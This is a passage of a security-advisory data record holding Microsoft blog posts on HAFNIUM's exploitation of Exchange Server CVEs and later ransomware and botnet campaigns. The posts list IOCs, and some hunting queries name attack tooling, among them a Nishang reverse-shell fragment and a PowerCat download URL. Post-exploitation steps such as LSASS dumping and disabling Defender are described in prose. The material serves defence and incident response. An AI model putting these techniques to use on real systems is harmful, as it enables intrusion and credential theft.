actors and elevate awareness of the sophisticated tactics and techniques used to target our customers. The related IOCs, [Azure Sentinel](<https://azure.microsoft.com/en-us/services/azure-sentinel/>) advanced hunting queries, and [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) product detections and queries shared in this blog will help SOCs proactively hunt for related activity in their environments and elevate any alerts for remediation.\n\nMicrosoft would like to thank our industry colleagues at Volexity and Dubex for reporting different parts of the attack chain and their collaboration in the investigation. Volexity has also [published a blog post](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities>) with their analysis. It is this level of proactive communication and intelligence sharing that allows the community to come together to get ahead of attacks before they spread and improve security for all.\n\n## Who is HAFNIUM?\n\nHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\n\nHAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like [Covenant](<https://github.com/cobbr/Covenant>), for command and control. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like [MEGA](<https://mega.nz/>).\n\nIn campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets\u2019 environments.\n\nHAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.\n\n## Technical details\n\nMicrosoft is providing the following details to help our customers understand the techniques used by HAFNIUM to exploit these vulnerabilities and enable more effective defense against any future attacks against unpatched systems.\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.\n\n[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n\n[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n## Attack details\n\nAfter exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. One example of a web shell deployed by HAFNIUM, written in ASP, is below:\n\n![Screenshot of web shell code](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig1.png)\n\nFollowing web shell deployment, HAFNIUM operators performed the following post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig2-procdump.png)\n\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fg3-7zip.png)\n\n * Adding and using Exchange PowerShell snap-ins to export mailbox data:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig4-Exchange-PowerShell.png)\n\n * Using the [Nishang](<https://github.com/samratashok/nishang>) Invoke-PowerShellTcpOneLine reverse shell:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig4-Nishang.png)\n\n * Downloading PowerCat from GitHub, then using it to open a connection to a remote server:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig5-PowerCat.png)\n\nHAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.\n\nOur blog, [Defending Exchange servers under attack](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>), offers advice for improving defenses against Exchange server compromise. Customers can also find additional guidance about web shell attacks in our blog [Web shell attacks continue to rise.](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>)\n\n## Can I determine if I have been compromised by this activity?\n\nThe below sections provide indicators of compromise (IOCs), detection guidance, and advanced hunting queries to help customers investigate this activity using Exchange server logs, Azure Sentinel, Microsoft Defender for Endpoint, and Microsoft 365 Defender. We encourage our customers to conduct investigations and implement proactive detections to identify possible prior campaigns and prevent future campaigns that may target their systems.\n\n### Check patch levels of Exchange Server\n\nThe Microsoft Exchange Server team has published a [blog post on these new Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) providing a script to get a quick inventory of the patch-level status of on-premises Exchange servers and answer some basic questions around installation of these patches.\n\n### Scan Exchange log files for indicators of compromise\n\nThe Exchange Server team has created a script to run a check for HAFNIUM IOCs to address performance and memory concerns. That script is available here: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n\n * CVE-2021-26855 exploitation can be detected via the following Exchange HttpProxy logs: \n * These logs are located in the following directory: %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\n * Exploitation can be identified by searching for log entries where the AuthenticatedUser is empty and the AnchorMailbox contains the pattern of ServerInfo~*/* \n * Here is an example PowerShell command to find these log entries:\n\n`Import-Csv -Path (Get-ChildItem -Recurse -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\" -Filter '*.log').FullName | Where-Object { $_.AnchorMailbox -like 'ServerInfo~*/*' -or $_.BackEndCookie -like 'Server~*/*~*'} | select DateTime, AnchorMailbox, UrlStem, RoutingHint, ErrorCode, TargetServerVersion, BackEndCookie, GenericInfo, GenericErrors, UrlHost, Protocol, Method, RoutingType, AuthenticationType, ServerHostName, HttpStatus, BackEndStatus, UserAgent`\n\n * * If activity is detected, the logs specific to the application specified in the AnchorMailbox path can be used to help determine what actions were taken. \n * These logs are located in the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging directory.\n * CVE-2021-26858 exploitation can be detected via the Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\n * Files should only be downloaded to the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\ClientAccess\\OAB\\Temp directory \n * In case of exploitation, files are downloaded to other directories (UNC or local paths)\n * Windows command to search for potential exploitation:\n\n`findstr /snip /c:\"Download failed and temporary file\" \"%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\\*.log\"`\n\n * CVE-2021-26857 exploitation can be detected via the Windows Application event logs \n * Exploitation of this deserialization bug will create Application events with the following properties: \n * Source: MSExchange Unified Messaging\n * EntryType: Error\n * Event Message Contains: System.InvalidCastException\n * Following is PowerShell command to query the Application Event Log for these log entries:\n\n`Get-EventLog -LogName Application -Source \"MSExchange Unified Messaging\" -EntryType Error | Where-Object { $_.Message -like \"*System.InvalidCastException*\" }`\n\n * CVE-2021-27065 exploitation can be detected via the following Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\n\nAll Set-<AppName>VirtualDirectory properties should never contain script. InternalUrl and ExternalUrl should only be valid Uris.\n\n * * Following is a PowerShell command to search for _potential_ exploitation:\n\n`Select-String -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\\*.log\" -Pattern 'Set-.+VirtualDirectory'`\n\n## Host IOCs\n\nMicrosoft is releasing a feed of observed indicators of compromise (IOCs) in related attacks. This feed is available in both [CSV](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>) and [JSON](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>) formats. This information is being shared as TLP:WHITE.\n\n### Hashes\n\nWeb shell hashes\n\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e\n * 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944\n\n### Paths\n\nWe observed web shells in the following paths:\n\n * _C:\\inetpub\\wwwroot\\aspnet_client\\_\n * _C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\_\n * _In Microsoft Exchange Server installation paths such as:_\n * _%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\_\n * _C:\\Exchange\\FrontEnd\\HttpProxy\\owa\\auth\\_\n\nThe web shells we detected had the following file names:\n\n * _web.aspx_\n * _help.aspx_\n * _document.aspx_\n * _errorEE.aspx_\n * _errorEEE.aspx_\n * _errorEW.aspx_\n * _errorFF.aspx_\n * _healthcheck.aspx_\n * _aspnet_www.aspx_\n * _aspnet_client.aspx_\n * _xx.aspx_\n * _shell.aspx_\n * _aspnet_iisstart.aspx_\n * _one.aspx_\n\n_ _Check for suspicious .zip, .rar, and .7z files in _C:\\ProgramData\\_, which may indicate possible data exfiltration.\n\nCustomers should monitor these paths for LSASS dumps:\n\n * _C:\\windows\\temp\\_\n * _C:\\root\\_\n\n### Tools\n\n * [Procdump](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>)\n * [Nishang](<https://github.com/samratashok/nishang>)\n * [PowerCat](<https://github.com/besimorhino/powercat>)\n\nMany of the following detections are for post-breach techniques used by HAFNIUM. So while these help detect some of the specific current attacks that Microsoft has observed it remains very important to apply the recently released updates for CVE-2021-26855, CVE-2021-26857, CVE-2021-27065 and CVE-2021-26858.\n\n## Microsoft Defender Antivirus detections\n\nPlease note that some of these detections are generic detections and not unique to this campaign or these exploits.\n\n * Exploit:Script/Exmann.A!dha\n * Behavior:Win32/Exmann.A\n * Backdoor:ASP/SecChecker.A\n * Backdoor:JS/Webshell _(not unique)_\n * Trojan:JS/Chopper!dha _(not unique)_\n * Behavior:Win32/DumpLsass.A!attk _(not unique)_\n * Backdoor:HTML/TwoFaceVar.B _(not unique)_\n\n## Microsoft Defender for Endpoint detections\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Possible web shell installation _(not unique)_\n * Process memory dump _(not unique)_\n\n## Azure Sentinel detections\n\n * [HAFNIUM Suspicious Exchange Request](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/HAFNIUMSuspiciousExchangeRequestPattern.yaml>)\n * [HAFNIUM UM Service writing suspicious file](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/HAFNIUMUmServiceSuspiciousFile.yaml>)\n * [HAFNIUM New UM Service Child Process](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMNewUMServiceChildProcess.yaml>)\n * [HAFNIUM Suspicious UM Service Errors](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMSuspiciousIMServiceError.yaml>)\n * [HAFNIUM Suspicious File Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/htttp_proxy_oab_CL/HAFNIUMSuspiciousFileDownloads.yaml>)\n\n## Advanced hunting queries\n\nTo locate possible exploitation activity related to the contents of this blog, you can run the following [advanced hunting](<https://securitycenter.windows.com/hunting>) queries via Microsoft Defender for Endpoint and Azure Sentinel:\n\n### Microsoft Defender for Endpoint advanced hunting queries\n\nMicrosoft 365 Defender customers can find related hunting queries below or at this GitHub location: [https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/ ](<https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/>)\n\nAdditional queries and information are available via [_Threat Analytics portal_](<https://securitycenter.windows.com/threatanalytics3/>) for Microsoft Defender customers.\n\n**UMWorkerProcess.exe in Exchange creating abnormal content**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service creating non-standard content on disk, which could indicate web shells or other malicious content, suggesting exploitation of CVE-2021-26858 vulnerability:\n\n`DeviceFileEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"CacheCleanup.bin\" | where FileName !endswith \".txt\" | where FileName !endswith \".LOG\" | where FileName !endswith \".cfg\" | where FileName != \"cleanup.bin\"`\n\n**UMWorkerProcess.exe spawning**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service spawning abnormal subprocesses, suggesting exploitation of CVE-2021-26857 vulnerability:\n\n`DeviceProcessEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"wermgr.exe\" | where FileName != \"WerFault.exe\"`\n\nPlease note excessive spawning of wermgr.exe and WerFault.exe could be an indicator of compromise due to the service crashing during deserialization.\n\n### Azure Sentinel advanced hunting queries\n\nAzure Sentinel customers can find a Sentinel query containing these indicators in the Azure Sentinel Portal or at this GitHub location: <https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/>.\n\nLook for Nishang Invoke-PowerShellTcpOneLine in Windows Event Logging:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"$client = New-Object System.Net.Sockets.TCPClient\"`\n\nLook for downloads of PowerCat in cmd and Powershell command line logging in Windows Event Logs:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\"`\n\nLook for Exchange PowerShell Snapin being loaded. This can be used to export mailbox data, subsequent command lines should be inspected to verify usage:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where isnotempty(CommandLine) | where CommandLine contains \"Add-PSSnapin Microsoft.Exchange.Powershell.Snapin\" | summarize FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by Computer, Account, CommandLine`\n\n \n\nThe post [HAFNIUM targeting Exchange Servers with 0-day exploits](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T21:07:53", "type": "mssecure", "title": "HAFNIUM targeting Exchange Servers with 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T21:07:53", "id": "MSSECURE:28641FE2F73292EB4B26994613CC882B", "href": "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-26T05:16:59", "description": "Microsoft continues to monitor and investigate attacks exploiting the recent on-premises Exchange Server vulnerabilities. These attacks are now performed by multiple threat actors ranging from financially motivated cybercriminals to state-sponsored groups. To help customers who are not able to immediately install updates, Microsoft [released a one-click tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) that automatically mitigates one of the vulnerabilities and scans servers for known attacks. Microsoft also [built this capability into Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>), expanding the reach of the mitigation. As of today, we have seen a significant decrease in the number of still-vulnerable servers \u2013 more than 92% of known worldwide Exchange IPs are now patched or mitigated. We continue to work with our customers and partners to mitigate the vulnerabilities.\n\nAs organizations recover from this incident, we continue to publish guidance and share threat intelligence to help detect and evict threat actors from affected environments. Today, we are sharing intelligence about what some attackers did after exploiting the vulnerable servers, ranging from ransomware to data exfiltration and deployment of various second-stage payloads. This blog covers:\n\n * Threat intelligence and technical details about known attacks, including components and attack paths, that defenders can use to investigate whether on-premises Exchange servers were compromised before they were patched and to comprehensively respond to and remediate these threats if they see them in their environments.\n * Detection and automatic remediation built into Microsoft Defender Antivirus and how investigation and remediation capabilities in solutions like Microsoft Defender for Endpoint can help responders perform additional hunting and remediate threats.\n\nAlthough the overall numbers of ransomware have remained extremely small to this point, it is important to remember that these threats show how quickly attackers can pivot their campaigns to take advantage of newly disclosed vulnerabilities and target unpatched systems, demonstrating how critical it is for organizations to apply security updates as soon as possible. We strongly urge organizations to identify and update vulnerable on-premises Exchange servers, and to follow mitigation and investigation guidance that we have collected and continue to update here: <https://aka.ms/ExchangeVulns>.\n\n## Mitigating post-exploitation activities\n\nThe first known attacks leveraging the Exchange Server vulnerabilities were by the nation-state actor HAFNIUM, which we detailed in [this blog](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). In the three weeks after the Exchange server vulnerabilities were disclosed and the security updates were released, Microsoft saw numerous other attackers adopting the exploit into their toolkits. Attackers are known to rapidly work to reverse engineer patches and develop exploits. In the case of a remote code execution (RCE) vulnerability, the rewards are high for attackers who can gain access before an organization patches, as patching a system does not necessarily remove the access of the attacker.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig1-exchange-server-exploit-chain.png)\n\n_Figure 1. The Exchange Server exploit chain_\n\nIn our investigation of the on-premises Exchange Server attacks , we saw systems being affected by multiple threats. **Many of the compromised systems have not yet received a secondary action**, such as human-operated ransomware attacks or data exfiltration, indicating attackers could be establishing and keeping their access for potential later actions. These actions might involve performing follow-on attacks via persistence on Exchange servers they have already compromised, or using credentials and data stolen during these attacks to compromise networks through other entry vectors.\n\nAttackers who included the exploit in their toolkits, whether through modifying public proof of concept exploits or their own research, capitalized on their window of opportunity to gain access to as many systems as they could. Some attackers were advanced enough to remove other attackers from the systems and use multiple persistence points to maintain access to a network.\n\nWe have built protections against these threats into Microsoft security solutions. Refer to the Appendix for a list of indicators of compromise, detection details, and advanced hunting queries. We have also provided additional tools and investigation and remediation guidance here: <https://aka.ms/exchange-customer-guidance>.\n\nWhile performing a full investigation on systems is recommended, the following themes are common in many of the attacks. These are prevailing threat trends that Microsoft has been monitoring, and existing solutions and recommendations for prevention and mitigation apply:\n\n * Web shells - As of this writing, many of the unpatched systems we observed had multiple web shells on them. Microsoft has been tracking the rise of web shell attacks for the past few years, ensuring our products detect these threats and providing remediation guidance for customers. For more info on web shells, read [Web shell attacks continue to rise](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>). We have also published guidance on [web shell threat hunting with Azure Sentinel](<http://aka.ms/exchange-web-shell-investigation>).\n * Human-operated ransomware - Ransomware attacks pose some of the biggest security risks for organizations today, and attackers behind these attacks were quick to take advantage of the on-premises Exchange Server vulnerabilities. Successfully exploiting the vulnerabilities gives attackers the ability to launch human-operated ransomware campaigns, a trend that Microsoft has been closely monitoring. For more information about human-operated ransomware attacks, including Microsoft solutions and guidance for improving defenses, read: [Human-operated ransomware attacks](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n * Credential theft \u2013 While credential theft is not the immediate goal of some of these attacks, access to Exchange servers allowed attackers to access and potentially steal credentials present on the system. Attackers can use these stolen credentials for follow-on attacks later, so organizations need to prioritize identifying and remediating impacted identities. For more information, read best practices for building credential hygiene.\n\nIn the following sections, we share our analysis of known post-compromise activities associated with exploitation of the Exchange server vulnerabilities because it is helpful to understand these TTPs, in order to defend against other actors using similar tactics or tools. While levels of disruptive post-compromise activity like ransomware may be limited at the time of this writing, Microsoft will continue to track this space and share information with the community. It\u2019s important to note that with some post-compromise techniques, attackers may gain highly privileged persistent access, but **many of the impactful subsequent attacker activities can be mitigated by practicing the principle of least privilege and mitigating lateral movement**.\n\n## DoejoCrypt ransomware\n\nDoejoCrypt was the first ransomware to appear to take advantage of the vulnerabilities, starting to encrypt in limited numbers shortly after the patches were released. Ransomware attackers often use multiple tools and exploits to gain initial access, including purchasing access through a broker or \u201creseller\u201d who sells access to systems they have already compromised. The DoejoCrypt attacks start with a variant of the Chopper web shell being deployed to the Exchange server post-exploitation.\n\nThe web shell writes a batch file to _C:\\Windows\\Temp\\xx.bat_. Found on all systems that received the DoejoCrypt ransomware payload, this batch file performs a backup of the Security Account Manager (SAM) database and the System and Security registry hives, allowing the attackers later access to passwords of local users on the system and, more critically, in the LSA Secrets portion of the registry, where passwords for services and scheduled tasks are stored.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig2-xx-bat.png)\n\n_Figure 2. xx.bat_\n\nGiven configurations that administrators typically use on Exchange servers, many of the compromised systems are likely to have had at least one service or scheduled task configured with a highly privileged account to perform actions like backups. **As service account credentials are not frequently changed, this could provide a great advantage to an attacker even if they lose their initial web shell access due to an antivirus detection**, as the account can be used to elevate privileges later, which is why we strongly recommend operating under the principle of least privileged access.\n\nThe batch file saves the registry hives to a semi-unique location, _C:\\windows\\temp\\debugsms_, assembles them into a CAB file for exfiltration, and then cleans up the folders from the system. The file also enables Windows Remote Management and sets up an HTTP listener, indicating the attacker might take advantage of the internet-facing nature of an Exchange Server and use this method for later access if other tools are removed.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig3-xx-bat-actions.png)\n\n_Figure 3. xx.bat actions_\n\nThe _xx.bat_ file has been run on many more systems than have been ransomed by the DoejoCrypt attacker, meaning that, while not all systems have moved to the ransom stage, the attacker has gained access to multiple credentials. On systems where the attacker moved to the ransom stage, we saw reconnaissance commands being run via the same web shell that dopped the xx.bat file (in this instance, a version of Chopper):\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig4-doejocrypt-recon-command.png)\n\n_Figure 4. DoejoCrypt recon command_\n\nAfter these commands are completed, the web shell drops a new payload to _C:\\Windows\\Help_ which, like in many human-operated ransomware campaigns, leads to the attack framework Cobalt Strike. In observed instances, the downloaded payload is shellcode with the file name _new443.exe_ or _Direct_Load.exe_. When run, this payload injects itself into _notepad.exe_ and reaches out to a C2 to download Cobalt Strike shellcode.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig5-doejocrypt-ransomware-attack-chain.png)\n\n_Figure 5. DoejoCrypt ransomware attack chain_\n\nDuring the hands-on-keyboard stage of the attack, a new payload is downloaded to _C:\\Windows\\Help_ with names like _s1.exe_ and _s2.exe_. This payload is the DoejoCrypt ransomware, which uses a _.CRYPT_ extension for the newly encrypted files and a very basic _readme.txt_ ransom note. In some instances, the time between _xx.bat_ being dropped and a ransomware payload running was under half an hour.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig6-doejocrypt-ransom-note.png)\n\n_Figure 6. DoejoCrypt ransom note_\n\nWhile the DoejoCrypt payload is the most visible outcome of the attackers\u2019 actions, the access to credentials they have gained could serve them for future campaigns if organizations do not reset credentials on compromised systems. An additional overlapping activity observed on systems where _xx.bat_ was present and the attackers were able to get Domain Administrator rights was the running of scripts to snapshot Active Directory with _ntdsutil_\u2014an action that, if executed successfully, could give the attackers access to all the passwords in Active Directory from a single compromised system.\n\n## Lemon Duck botnet\n\nCryptocurrency miners were some of the first payloads we observed being dropped by attackers from the post-exploit web shells. In the first few days after the security updates were released, we observed multiple cryptocurrency miner campaigns, which had been previously targeting SharePoint servers, add Exchange Server exploitation to their repertoire. Most of these coin miners were variations on XMRig miners, and many arrived via a multi-featured implant with the capability to download new payloads or even move laterally.\n\nLemon Duck, a known cryptocurrency botnet named for a variable in its code, dove into the Exchange exploit action, adopting different exploit styles and choosing to use a fileless/web shell-less option of direct PowerShell commands from w3wp (the IIS worker process) for some attacks. While still maintaining their normal email-based campaigns, the Lemon Duck operators compromised numerous Exchange servers and moved in the direction of being more of a malware loader than a simple miner.\n\nUsing a form of the attack that allows direct execution of commands versus dropping a web shell, the Lemon Duck operators ran standard Invoke Expression commands to download a payload. Having used the same C2 and download servers for some time, the operators applied a varied degree of obfuscation to their commands on execution.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig7-lemon-duck-payload-executions.png)\n\n_Fig 7. Example executions of Lemon Duck payload downloads_\n\nThe Lemon Duck payload is an encoded and obfuscated PowerShell script. It first removes various security products from the system, then creates scheduled tasks and WMI Event subscription for persistence. A second script is downloaded to attempt to evade Microsoft Defender Antivirus, abusing their administrative access to run the _Set-MPPreference_ command to disable real-time monitoring (a tactic that Microsoft Defender [Tamper protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) blocks) and add scanning exclusions for the C:\\ drive and the PowerShell process.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig8a-lemon-duck-payloads.png)\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig8b-lemon-duck-payloads.png)\n\n_Figure 8. Lemon Duck payloads_\n\nOne randomly named scheduled task connects to a C2 every hour to download a new payload, which includes various lateral movement and credential theft tools. The operators were seen to download RATs and information stealers, including [Ramnit](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Ramnit>) payloads.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig9-Lemon-Duck-post-exploitation-activities.png)\n\n_Figure 9. Lemon Duck post-exploitation activities_\n\nIn some instances, the operators took advantage of having compromised mail servers to access mailboxes and send emails containing the Lemon Duck payload using various colorful email subjects.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig10-email-subjects-lemon-duck.png)\n\n_Figure 10. Email subjects of possibly malicious emails_\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig11-attachment-variables.png)\n\n_Figure 11. Attachment variables_\n\nIn one notable example, the Lemon Duck operators compromised a system that already had _xx.bat_ and a web shell. After establishing persistence on the system in a non-web shell method, the Lemon Duck operators were observed cleaning up other attackers\u2019 presence on the system and mitigating the CVE-2021-26855 (SSRF) vulnerability using a legitimate cleanup script that they hosted on their own malicious server. This action prevents further exploitation of the server and removes web shells, giving Lemon Duck exclusive access to the compromised server. This stresses the need to fully investigate systems that were exposed, even if they have been fully patched and mitigated, per traditional incident response process.\n\n## Pydomer ransomware\n\nWhile DoejoCrypt was a new ransomware payload, the access gained by attackers via the on-premises Exchange Server vulnerabilities will likely become part of the complex cybercriminal economy where additional ransomware operators and affiliates take advantage of it. The first existing ransomware family to capitalize on the vulnerabilities was Pydomer. This ransomware family was previously seen using vulnerabilities in attacks, notably taking advantage of Pulse Secure VPN vulnerabilities, for which Pulse Secure has released security patches, to steal credentials and perform ransomware attacks.\n\nIn this campaign, the operators scanned and mass-compromised unpatched Exchange Servers to drop a web shell. They started later than some other attackers, with many compromises occurring between March 18 and March 20, a window when fewer unpatched systems were available. They then dropped a web shell, with a notable file name format: \u201cChack[Word][Country abbreviation]\u201d:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig12-web-shell-names-pydomer.png)\n\n_Figure 12. Example web shell names observed being used by the Pydomer attackers_\n\nThese web shells were observed on around 1,500 systems, not all of which moved to the ransomware stage. The attackers then used their web shell to dump a _test.bat_ batch file that performed a similar function in the attack chain to the _xx.bat_ of the DoejoCrypt operators and allowed them to perform a dump of the LSASS process.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig13-Pydomer-post-exploitation-activities.png)\n\n_Figure 13. Pydomer post-exploitation activities_\n\nThis access alone would be valuable to attackers for later attacks, similar to the credentials gained during their use of Pulse Secure VPN vulnerabilities. The highly privileged credentials gained from an Exchange system are likely to contain domain administrator accounts and service accounts with backup privileges, meaning these attackers could perform ransomware and exfiltration actions against the networks they compromised long after the Exchange Server is patched and even enter via different means.\n\nOn systems where the attackers did move to second-stage ransomware operations, they utilized a Python script compiled to an executable and the Python cryptography libraries to encrypt files. The attackers then executed a PowerShell script via their web shell that acts as a downloader and distribution mechanism for the 